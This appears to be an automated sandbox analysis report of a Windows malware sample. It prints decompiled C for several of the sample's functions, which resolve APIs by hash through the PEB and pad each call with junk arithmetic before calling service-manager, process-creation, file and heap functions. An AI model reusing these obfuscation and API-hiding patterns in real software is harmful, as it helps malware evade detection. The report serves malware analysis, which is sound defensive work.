9074->9081 9076 7445a5 9077 737af8 GetPEB 9076->9077 9078 7445a3 9077->9078 9078->8126 9079 73ab66 2 API calls 9079->9081 9080 738786 GetPEB 9080->9081 9081->9076 9081->9078 9081->9079 9081->9080 9082 73ae03 GetPEB 9081->9082 9091 73efa6 9081->9091 9082->9081 9084 73aca9 9083->9084 9085 732d9f GetPEB 9084->9085 9086 73ad23 9085->9086 9086->9070 9088 749062 9087->9088 9089 732d9f GetPEB 9088->9089 9090 7490c7 9089->9090 9090->9073 9092 73efbf 9091->9092 9093 732d9f GetPEB 9092->9093 9094 73f051 9093->9094 9094->9081 9095 74d80c 9096 74d8a5 9095->9096 9097 74d8cc 9095->9097 9101 745cf9 9096->9101 9100 743cbb 2 API calls 9100->9097 9113 746288 9101->9113 9102 74648d 9104 739700 3 API calls 9102->9104 9103 74e35a GetPEB 9103->9113 9105 74648b 9104->9105 9105->9097 9105->9100 9106 73ea7b 2 API calls 9106->9113 9107 751310 GetPEB 9107->9113 9108 7512a8 GetPEB 9108->9113 9110 73ab66 RtlAllocateHeap GetPEB 9110->9113 9111 73ae03 GetPEB 9111->9113 9112 73e7ce GetPEB 9112->9113 9113->9102 9113->9103 9113->9105 9113->9106 9113->9107 9113->9108 9113->9110 9113->9111 9113->9112 9114 74fc96 9113->9114 9115 74fcac 9114->9115 9116 732d9f GetPEB 9115->9116 9117 74fd1a lstrcmpiW 9116->9117 9117->9113

                                                                                                                      Executed Functions

                                                                                                                      Function 0073EA7B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 462 73ea7b-73eb35 call 73cf25 call 732d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0073EA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t41;
				intOrPtr* _t50;
				void* _t51;
				signed int _t52;
				signed int _t53;
				void* _t60;

				_t60 = __edx;
				E0073CF25(_t41);
				_v16 = 0xd33285;
				_v16 = _v16 + 0xd9cb;
				_v16 = _v16 | 0xd94823ae;
				_v16 = _v16 ^ 0xd9d95ea2;
				_v8 = 0xf9f040;
				_v8 = _v8 ^ 0x026675a4;
				_t52 = 0x46;
				_v8 = _v8 / _t52;
				_t53 = 0x2b;
				_v8 = _v8 / _t53;
				_v8 = _v8 ^ 0x000f054e;
				_v12 = 0x255c2b;
				_v12 = _v12 ^ 0x0b9b7933;
				_v12 = _v12 + 0xffff1ebc;
				_v12 = _v12 ^ 0x0bb758ac;
				_t50 = E00732D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
				return _t51;
			}












                                                                                                                      0x0073ea85
                                                                                                                      0x0073ea9a
                                                                                                                      0x0073ea9f
                                                                                                                      0x0073eaa9
                                                                                                                      0x0073eab2
                                                                                                                      0x0073eab9
                                                                                                                      0x0073eac0
                                                                                                                      0x0073eac7
                                                                                                                      0x0073ead3
                                                                                                                      0x0073ead8
                                                                                                                      0x0073eae0
                                                                                                                      0x0073eae8
                                                                                                                      0x0073eaeb
                                                                                                                      0x0073eaf2
                                                                                                                      0x0073eaf9
                                                                                                                      0x0073eb00
                                                                                                                      0x0073eb07
                                                                                                                      0x0073eb1f
                                                                                                                      0x0073eb2e
                                                                                                                      0x0073eb35

                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 0073EB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: e354533e284a663d70fdd64fd0ffdf4f21065de5a964470915759ad1b32ddbfb
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: 30119736D00208FBDB14DEE6C94A8DFBFB5EB85310F108099F504A6211E7754B61AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0073EB36 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 467 73eb36-73ebf1 call 73cf25 call 732d9f OpenSCManagerW
                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E0073EB36(void* __ecx, intOrPtr _a4, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t40;
				void* _t52;
				signed int _t54;
				signed int _t55;

				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E0073CF25(_t40);
				_v32 = 0xf43dc;
				asm("stosd");
				asm("stosd");
				_t54 = 0x7c;
				asm("stosd");
				_v12 = 0x784be4;
				_t6 =  &_v12; // 0x784be4
				_t55 = 0x36;
				_v12 =  *_t6 / _t54;
				_v12 = _v12 + 0x9f6a;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x004694cb;
				_v8 = 0x884396;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x1535ea2d;
				_v8 = _v8 | 0xb4c8309a;
				_v8 = _v8 ^ 0xb7dc5be9;
				_v16 = 0x9578bf;
				_v16 = _v16 / _t55;
				_v16 = _v16 ^ 0x000e2a9d;
				E00732D9F(0xcb6a962, 0x1f4, _t55, 0x1b74c9e2);
				_t52 = OpenSCManagerW(0, 0, _a12); // executed
				return _t52;
			}












                                                                                                                      0x0073eb3e
                                                                                                                      0x0073eb43
                                                                                                                      0x0073eb44
                                                                                                                      0x0073eb47
                                                                                                                      0x0073eb49
                                                                                                                      0x0073eb4e
                                                                                                                      0x0073eb5d
                                                                                                                      0x0073eb62
                                                                                                                      0x0073eb63
                                                                                                                      0x0073eb66
                                                                                                                      0x0073eb67
                                                                                                                      0x0073eb6e
                                                                                                                      0x0073eb73
                                                                                                                      0x0073eb74
                                                                                                                      0x0073eb79
                                                                                                                      0x0073eb94
                                                                                                                      0x0073eb97
                                                                                                                      0x0073eb9e
                                                                                                                      0x0073eba5
                                                                                                                      0x0073eba9
                                                                                                                      0x0073ebb0
                                                                                                                      0x0073ebb7
                                                                                                                      0x0073ebbe
                                                                                                                      0x0073ebca
                                                                                                                      0x0073ebcd
                                                                                                                      0x0073ebdd
                                                                                                                      0x0073ebea
                                                                                                                      0x0073ebf1

                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 0073EBEA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ManagerOpen
                                                                                                                      • String ID: Kx
                                                                                                                      • API String ID: 1889721586-2841836380
                                                                                                                      • Opcode ID: 41dff3092bc1f63532a7cccec9612a866476fb4b2cab239042f705f6c49823a2
                                                                                                                      • Instruction ID: 01d7eb478d017ae711386a8fa65b450f6c1d14cb966ee3bdbeb40c7f8f661b19
                                                                                                                      • Opcode Fuzzy Hash: 41dff3092bc1f63532a7cccec9612a866476fb4b2cab239042f705f6c49823a2
                                                                                                                      • Instruction Fuzzy Hash: 2D118671D05208FBEB04EFA6D84A9DEBFB5EF44310F208099E404B6211D7B95B14CB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00735D65 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E00735D65(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t31;
				intOrPtr* _t38;
				void* _t39;
				void* _t42;

				_t42 = __edx;
				E0073CF25(_t31);
				_v12 = 0x1c122d;
				_v12 = _v12 * 0x6a;
				_v12 = _v12 ^ 0xecdd50d1;
				_v12 = _v12 ^ 0xe74257e3;
				_v16 = 0xd55139;
				_v16 = _v16 + 0xd07c;
				_v16 = _v16 ^ 0x00d6881e;
				_v8 = 0x156dc9;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x03beef10;
				_v8 = _v8 + 0xffffe13f;
				_v8 = _v8 ^ 0x06271f08;
				_t38 = E00732D9F(0x4ef88dcb, 0x31, __ecx, 0xa62ab78c);
				_t39 =  *_t38(_t42, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
				return _t39;
			}










                                                                                                                      0x00735d6f
                                                                                                                      0x00735d82
                                                                                                                      0x00735d87
                                                                                                                      0x00735d9b
                                                                                                                      0x00735d9e
                                                                                                                      0x00735da5
                                                                                                                      0x00735dac
                                                                                                                      0x00735db3
                                                                                                                      0x00735dba
                                                                                                                      0x00735dc1
                                                                                                                      0x00735dd3
                                                                                                                      0x00735dd6
                                                                                                                      0x00735ddd
                                                                                                                      0x00735de4
                                                                                                                      0x00735df4
                                                                                                                      0x00735e04
                                                                                                                      0x00735e0a

                                                                                                                      APIs
                                                                                                                      • SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 00735E04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileHandleInformation
                                                                                                                      • String ID: WB
                                                                                                                      • API String ID: 3935143524-2158411504
                                                                                                                      • Opcode ID: 43935c843aae4829611c0686b053fedb4fd8e6d3d3521d64be353873fdee31cf
                                                                                                                      • Instruction ID: 41f65f2b695b9bbd9bd7e5cdfe7ad1ac95da54c365ec2ee65d6d67b426665c35
                                                                                                                      • Opcode Fuzzy Hash: 43935c843aae4829611c0686b053fedb4fd8e6d3d3521d64be353873fdee31cf
                                                                                                                      • Instruction Fuzzy Hash: 1A112576D0120CFBDF10DFA4D946ACEBFB4EB14300F208088F9107A2A1D7755B64AB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0074E689 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36serviceCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 477 74e689-74e712 call 73cf25 call 732d9f CloseServiceHandle
                                                                                                                      C-Code - Quality: 73%
                                                                                                                      			E0074E689(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t27;
				int _t34;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0073CF25(_t27);
				_v8 = 0x8d6642;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0x9ccb;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x0002819d;
				_v16 = 0x6a74c5;
				_v16 = _v16 | 0x354c93f6;
				_v16 = _v16 ^ 0x356d05ed;
				_v12 = 0xe812c4;
				_v12 = _v12 * 0x26;
				_v12 = _v12 ^ 0x227e2d65;
				E00732D9F(0x23833043, 0x1ec, __ecx, 0x1b74c9e2);
				_t34 = CloseServiceHandle(_a8); // executed
				return _t34;
			}








                                                                                                                      0x0074e68f
                                                                                                                      0x0074e692
                                                                                                                      0x0074e695
                                                                                                                      0x0074e699
                                                                                                                      0x0074e69a
                                                                                                                      0x0074e69f
                                                                                                                      0x0074e6a9
                                                                                                                      0x0074e6ad
                                                                                                                      0x0074e6b4
                                                                                                                      0x0074e6b8
                                                                                                                      0x0074e6bf
                                                                                                                      0x0074e6c6
                                                                                                                      0x0074e6cd
                                                                                                                      0x0074e6d4
                                                                                                                      0x0074e6ef
                                                                                                                      0x0074e6f2
                                                                                                                      0x0074e702
                                                                                                                      0x0074e70d
                                                                                                                      0x0074e712

                                                                                                                      APIs
                                                                                                                      • CloseServiceHandle.ADVAPI32(356D05ED), ref: 0074E70D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleService
                                                                                                                      • String ID: e-~"
                                                                                                                      • API String ID: 1725840886-2046105602
                                                                                                                      • Opcode ID: c1046b7ecd956da74b7a5d1762cebc86866113f0b369af2bd128aca44436a943
                                                                                                                      • Instruction ID: 4060cf60ed89faeb230967125dba32792052e58f0fa98173b6114d4715cd81b3
                                                                                                                      • Opcode Fuzzy Hash: c1046b7ecd956da74b7a5d1762cebc86866113f0b369af2bd128aca44436a943
                                                                                                                      • Instruction Fuzzy Hash: 9601E575C0020CFBCB08EFA4D98689EBFB4EB54304F208188E914A6251D3759B649F50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00744DAD Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 482 744dad-744e63 call 73cf25 call 732d9f CloseHandle
                                                                                                                      C-Code - Quality: 72%
                                                                                                                      			E00744DAD(void* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t41;
				int _t50;
				signed int _t52;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0073CF25(_t41);
				_v32 = 0xb76b6b;
				asm("stosd");
				asm("stosd");
				_t52 = 0x74;
				asm("stosd");
				_v16 = 0xdf8814;
				_v16 = _v16 | 0xf44f2943;
				_v16 = _v16 << 6;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x01b79e59;
				_v12 = 0x5a8921;
				_v12 = _v12 / _t52;
				_v12 = _v12 << 0xd;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x000807b1;
				_v8 = 0x5c56e6;
				_v8 = _v8 ^ 0x7431396c;
				_v8 = _v8 + 0xffff5a5b;
				_v8 = _v8 + 0x50a9;
				_v8 = _v8 ^ 0x74635491;
				E00732D9F(0x25d2a026, 0x1b9, _t52, 0xa62ab78c);
				_t50 = CloseHandle(_a4); // executed
				return _t50;
			}











                                                                                                                      0x00744db4
                                                                                                                      0x00744db7
                                                                                                                      0x00744dba
                                                                                                                      0x00744dbf
                                                                                                                      0x00744dc4
                                                                                                                      0x00744dd3
                                                                                                                      0x00744dd8
                                                                                                                      0x00744dd9
                                                                                                                      0x00744de0
                                                                                                                      0x00744de1
                                                                                                                      0x00744de8
                                                                                                                      0x00744def
                                                                                                                      0x00744df3
                                                                                                                      0x00744df7
                                                                                                                      0x00744dfe
                                                                                                                      0x00744e0f
                                                                                                                      0x00744e12
                                                                                                                      0x00744e16
                                                                                                                      0x00744e1a
                                                                                                                      0x00744e21
                                                                                                                      0x00744e28
                                                                                                                      0x00744e2f
                                                                                                                      0x00744e36
                                                                                                                      0x00744e3d
                                                                                                                      0x00744e52
                                                                                                                      0x00744e5d
                                                                                                                      0x00744e63

                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(000807B1,?,?,?,?,?,?,?,?,?), ref: 00744E5D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID: l91t
                                                                                                                      • API String ID: 2962429428-3929799471
                                                                                                                      • Opcode ID: 8da09b77d3d2241b99642312c43de4b26fc02d46d5695bad48a0b92c4f965d63
                                                                                                                      • Instruction ID: 49e7b2294f2da53d0443ac0db9372995b733812732221af4c25bbdc51ccb3035
                                                                                                                      • Opcode Fuzzy Hash: 8da09b77d3d2241b99642312c43de4b26fc02d46d5695bad48a0b92c4f965d63
                                                                                                                      • Instruction Fuzzy Hash: 9A113476D0060CFFEB05DFE5D84A89EBBB0EB40314F50C088E914A6256D7B99B588F42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0074679C Relevance: 1.6, APIs: 1, Instructions: 65processCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 520 74679c-746863 call 73cf25 call 732d9f CreateProcessW
                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E0074679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				void* _t40;
				int _t46;
				WCHAR* _t50;

				_push(_a64);
				_t50 = __ecx;
				_push(_a60);
				_push(0);
				_push(0);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0073CF25(_t40);
				_v24 = 0x639852;
				_v20 = 0;
				_v12 = 0x9647c4;
				_v12 = _v12 + 0x4343;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x0009af77;
				_v16 = 0x17e0ca;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x000f0fb4;
				_v8 = 0x429f7b;
				_v8 = _v8 + 0xffff27c2;
				_v8 = _v8 + 0xb08b;
				_v8 = _v8 ^ 0x004b6691;
				E00732D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
				return _t46;
			}











                                                                                                                      0x007467a4
                                                                                                                      0x007467a9
                                                                                                                      0x007467ab
                                                                                                                      0x007467ae
                                                                                                                      0x007467af
                                                                                                                      0x007467b0
                                                                                                                      0x007467b3
                                                                                                                      0x007467b4
                                                                                                                      0x007467b7
                                                                                                                      0x007467ba
                                                                                                                      0x007467bb
                                                                                                                      0x007467be
                                                                                                                      0x007467c1
                                                                                                                      0x007467c4
                                                                                                                      0x007467c7
                                                                                                                      0x007467c8
                                                                                                                      0x007467cb
                                                                                                                      0x007467cf
                                                                                                                      0x007467d0
                                                                                                                      0x007467d5
                                                                                                                      0x007467df
                                                                                                                      0x007467e2
                                                                                                                      0x007467e9
                                                                                                                      0x007467f0
                                                                                                                      0x007467f4
                                                                                                                      0x007467fb
                                                                                                                      0x00746802
                                                                                                                      0x00746806
                                                                                                                      0x0074680d
                                                                                                                      0x00746814
                                                                                                                      0x0074681b
                                                                                                                      0x00746822
                                                                                                                      0x00746842
                                                                                                                      0x0074685c
                                                                                                                      0x00746863

                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 0074685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: 4c32dca6c78fcdaf6119b708e9e0c1235b6fcf2d99bd19457976d37bf8dc99cf
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: C721E77290024CBBDF119F95CD09CDFBFB9EF99714F008148FA1466121D7B68A64EBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0074E938 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 48%
                                                                                                                      			E0074E938(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, long _a36, WCHAR* _a40) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t34;
				void* _t41;
				long _t45;
				long _t46;

				_push(_a40);
				_t45 = __edx;
				_push(_a36);
				_t46 = __ecx;
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0073CF25(_t34);
				_v16 = 0x974c12;
				_v16 = _v16 * 0x75;
				_v16 = _v16 ^ 0x4529a886;
				_v12 = 0x89ee90;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x0001fd6b;
				_v8 = 0x2afb1;
				_v8 = _v8 + 0xffff660b;
				_v8 = _v8 | 0x1aac0731;
				_v8 = _v8 ^ 0x1aae47e7;
				E00732D9F(0xb361a139, 0x20d, __ecx, 0xa62ab78c);
				_t41 = CreateFileW(_a40, _t45, _a36, 0, _a12, _t46, 0); // executed
				return _t41;
			}










                                                                                                                      0x0074e941
                                                                                                                      0x0074e946
                                                                                                                      0x0074e948
                                                                                                                      0x0074e94b
                                                                                                                      0x0074e94d
                                                                                                                      0x0074e950
                                                                                                                      0x0074e951
                                                                                                                      0x0074e954
                                                                                                                      0x0074e957
                                                                                                                      0x0074e958
                                                                                                                      0x0074e95b
                                                                                                                      0x0074e95e
                                                                                                                      0x0074e961
                                                                                                                      0x0074e962
                                                                                                                      0x0074e963
                                                                                                                      0x0074e968
                                                                                                                      0x0074e97c
                                                                                                                      0x0074e97f
                                                                                                                      0x0074e986
                                                                                                                      0x0074e98d
                                                                                                                      0x0074e991
                                                                                                                      0x0074e995
                                                                                                                      0x0074e99c
                                                                                                                      0x0074e9a3
                                                                                                                      0x0074e9aa
                                                                                                                      0x0074e9b1
                                                                                                                      0x0074e9cb
                                                                                                                      0x0074e9e0
                                                                                                                      0x0074e9e8

                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 0074E9E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 360c415e9015d3d13679f61f4bfb391b888432a2a898910ac906551ddd5173d2
                                                                                                                      • Instruction ID: a7b73bd6017137ea7914bb878ac60be7eb758502ff174a6bf4a629821dd64edf
                                                                                                                      • Opcode Fuzzy Hash: 360c415e9015d3d13679f61f4bfb391b888432a2a898910ac906551ddd5173d2
                                                                                                                      • Instruction Fuzzy Hash: 4C11147690120CBFDF059ED5DC8ACDEBFB9EB48354F148198F924A6211D2768A24DF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00737A47 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 71%
                                                                                                                      			E00737A47(long __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t37;
				void* _t45;
				long _t48;

				_push(_a20);
				_t48 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0073CF25(_t37);
				_v20 = _v20 & 0x00000000;
				_v24 = 0xfcacd9;
				_v8 = 0xc1635f;
				_v8 = _v8 >> 7;
				_v8 = _v8 * 0x50;
				_v8 = _v8 * 0x36;
				_v8 = _v8 ^ 0x197e1637;
				_v16 = 0x23fde3;
				_v16 = _v16 << 0xf;
				_v16 = _v16 + 0x8916;
				_v16 = _v16 ^ 0xfef173e1;
				_v12 = 0xdffc87;
				_v12 = _v12 | 0x0f84fa40;
				_v12 = _v12 ^ 0x35513bb9;
				_v12 = _v12 ^ 0x3a8da81e;
				E00732D9F(0x9afcb52f, 0x1c3, __ecx, 0xa62ab78c);
				_t45 = RtlAllocateHeap(_a8, _t48, _a12); // executed
				return _t45;
			}











                                                                                                                      0x00737a4e
                                                                                                                      0x00737a51
                                                                                                                      0x00737a53
                                                                                                                      0x00737a56
                                                                                                                      0x00737a59
                                                                                                                      0x00737a5c
                                                                                                                      0x00737a60
                                                                                                                      0x00737a61
                                                                                                                      0x00737a66
                                                                                                                      0x00737a6d
                                                                                                                      0x00737a74
                                                                                                                      0x00737a7b
                                                                                                                      0x00737a93
                                                                                                                      0x00737a9a
                                                                                                                      0x00737a9d
                                                                                                                      0x00737aa4
                                                                                                                      0x00737aab
                                                                                                                      0x00737aaf
                                                                                                                      0x00737ab6
                                                                                                                      0x00737abd
                                                                                                                      0x00737ac4
                                                                                                                      0x00737acb
                                                                                                                      0x00737ad2
                                                                                                                      0x00737ae2
                                                                                                                      0x00737af1
                                                                                                                      0x00737af7

                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(FEF173E1,00989527,00000000,?,?,?,?,?,?,?,?,?,?,003C356D), ref: 00737AF1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
